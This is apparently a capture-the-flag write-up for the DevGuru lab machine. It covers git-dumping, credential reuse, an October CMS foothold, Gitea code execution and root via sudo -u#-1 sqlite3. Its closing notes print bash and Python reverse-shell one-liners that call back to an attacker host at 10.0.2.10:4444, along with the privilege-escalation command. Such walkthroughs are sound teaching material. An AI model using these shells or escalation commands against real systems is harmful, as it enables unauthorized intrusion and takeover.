Devguru

Description ⤵️

💡 DevGuru is a fictional web development company hiring you for a pentest assessment. You have been tasked with finding vulnerabilities on their corporate website and obtaining root.

OSCP like ~ Real life based

Difficulty: Intermediate (Depends on experience)

Let’s find the IP Address first »

IP : 10.0.2.26

Port Scan Results ➡️

OPEN PORTS >
22   SSH
80   HTTP
8585 unknown

---

Web Enumeration ⤵️

Now lets look into the directory traversal files / directories →

Since it needs Authentication So I Have to find the username and the password to get the access →

Lets use nikto also →

Now we have .git as a directory so its time to extract some git directories with the help of git-dumper →

Now lets recon further →

Data → /git-dump/config/databases.php →

'database'   => 'octoberdb',
'username'   => 'october',
'password'   => 'SQ66EBYx4GT3byXH'
While opening the git-dump directory I found → adminer.php →

After using that credentials I got this →

Now I knew that the password can be changed and what its type so lets insert password as password →

after replacing the password and saving It Loged in with frank → password →

I got a reverse shell for october cms →

When I saved the code I loaded the site and I got this →

After some enumeration I found this → on /var/backups/app.ini.bak →

Now I have the credentials of gitea for mysql services lets use it similar as we did before →

username → gitea
password → UfFPTF8C8jjxVF2m

with this I got in →

Now lets use that exploit →

The Exploit was not working so lets use the mannual code execution →

Now lets edit and commit any file so I choose README.md file →

Now I got it →

user.txt → 22854d0aec6ba776f9d35bf7b0e00217

Now lets check the *sudo -l* further and I got this →

lets use it →

command →
**`sudo** -u#-1 **/**usr**/**bin**/**sqlite3 **/**dev**/**null '.shell /bin/bash`

root.txt → 96440606fb88aa7497cde5a8e68daf8f

---

Summery Notes →

1. Git enumeration with git-dumper and executing the reverse shell was on good path.
2. I enjoyed the swaping of the password method from mysql .
3. I got to know about october CMS and its reverse shell code .
4. Also about the sudo vulnerability part ←

october CMS reverse shell code –>

**function** onstart()**{** **exec(**"/bin/bash -c 'bash -i >& /dev/tcp/10.0.2.10/4444 0>&1'"**);}**

python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

root →

sudo -u#-1 /usr/bin/sqlite3 /dev/null '.shell /bin/bash -i'

---

If you have any questions or suggestions, please leave a comment below. Thank You !